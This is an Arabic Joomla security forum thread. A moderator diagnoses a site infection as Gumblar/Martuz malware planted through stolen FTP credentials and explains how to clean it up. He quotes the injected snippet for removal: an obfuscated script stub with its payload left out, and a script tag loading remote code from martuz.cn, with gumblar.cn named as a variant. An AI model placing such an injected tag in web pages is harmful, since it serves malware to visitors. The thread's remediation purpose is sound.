سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

كل ما يتعلق بحماية و تأمين جوملا! وتحسين سرعة التنفيذ والأداء

Moderators: sherif, General Support Moderators

Locked
hassaniy
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 220
Joined: Mon May 14, 2007 1:51 pm

سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

Post by hassaniy » Sun May 24, 2009 2:16 pm

السلام عليكم ورحمة الله
قمت مؤخرا بإضافة بعض الاضافات البرمجية وادخال بعض الأكواد التي وجدتها في مختلف المنتديات ، ومن بين التغييرات التي قمت بها لتسريع الصفحات ، وبعد حين أصبح موقعي مصابا بفيروس مما يجعل المتصفح ومكافح الفيروسات يعترضه ، كما تلقيت عدة شكاوي من الزوار ، وأتساءل ما نوع هذا الفيروس ، وما هو الحل لتجاوز هذه المحنة ؟؟؟
www.clubanezi.anezitoday.net
مع كل التحية والتقدير

User avatar
sherif
Joomla! Ace
Joomla! Ace
Posts: 1560
Joined: Fri Jan 12, 2007 12:15 am
Location: Dikirnis , Egypt :: دكرنس ، مصر
Contact:

Re: سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

Post by sherif » Sun May 24, 2009 11:37 pm

السلام عليكم
تم التعرف على الفيروس وهو يخترق المواقع باستخدام باسورد اف تي بي المخزنة على جهازك انت
ليست عملية اختراق لجملة ، بل جهازك ملوث بفيروس سرق الباسورد واتصل بموقعك ورفع التعديلات عليه

ابحث فى ملف index.php الرئيسي لموقعك عن هذا الكود وقم بحذفه

Code: Select all

<script language="javascript"><!-- 
(function(){var t2A6=unescape(('تجد هنا سطر طويل من تعليمات السكربت المشفرة
 --></script><script src="//martuz.cn/vid/?id="></script>
هناك احتمال كبير أن جميع صفحات موقعك التى تحمل اسم index فى الفولدرات الفرعية قد أصيبت أيضا
لذلك يجب عليك البحث فيها

هناك احتمال لتكرار وجود نفس السكربت ولكن مع اسم موقع gumblar.cn بدلا من martuz.cn لذلك مطلوب البحث عن هذا الاسم ايضا ، وان وجدته احذف السكربت الذى يحتويه بالكامل بين تعليمتي
<script>.........</script>
أقترح بشدة :
اغلاق الموقع مؤقتا
ضغط ملفات جملة بالكامل فى ملف و تنزيله على جهازك
فك ضغط الملف على جهازك و البحث فيه
مباشرة البحث عن الكود المذكور اعلاه فى كل صفحات الموقع باستخدام احد ادوات البحث النصي التي تدعم البحث و الاستبدال السريع فى الملفات مباشرة
منها برنامج اسمه
inforapid
ممكن تنزيله من موقعه
inforapid.com

hassaniy
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 220
Joined: Mon May 14, 2007 1:51 pm

Re: سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

Post by hassaniy » Mon May 25, 2009 12:37 pm

السلام عليكم ورحمة الله
بارك الله فيك أخ شريف على الرد القيم ، وأتساءل هل ينفع استبدال جميع ملفات جوملا بملفات جديدة لنفس النسخة ؟؟؟

User avatar
sherif
Joomla! Ace
Joomla! Ace
Posts: 1560
Joined: Fri Jan 12, 2007 12:15 am
Location: Dikirnis , Egypt :: دكرنس ، مصر
Contact:

Re: سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

Post by sherif » Mon May 25, 2009 1:21 pm

طيب ماذا عن الاضافات من كمبوننت و موديول الذى قم بتركيبهم فى موقعك ؟
طبعا لن يكونوا ضمن ملفات نسخة جملة لأنك اضفتهم بصفة منفصلة بعد التنصيب
هل تضمن انهم خاليين من الاصابة ؟
عموما حاول ان تفحصهم بحثا عن كود الفيروس ، وانت و حظك فلا أضمن لك شيئ فى هذه الحالة

كذلك هل تضمن عدم وجود ملفات اخرى غير معروفة لك و قد أصيبت و مازالت موجودة على السيرفر ؟
حاول فحص الفولدرات و مراجعة اى ملفات شكلها غريب
ثم من السي بانل افحص قسم الكرون جوبcronjob للتأكد من عدم وجود أى عمليات مجدولة بدون علمك فاذا وجدت أى أوامر محفوظة ، قم بالغائها فورا

hassaniy
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 220
Joined: Mon May 14, 2007 1:51 pm

Re: سؤال عاجل بخصوص اختراق جوملا ؟؟؟؟

Post by hassaniy » Mon May 25, 2009 1:32 pm

جزاك الله كل الخير أخ شريف


Locked

Return to “الحماية - و تحسين السرعة والأداء”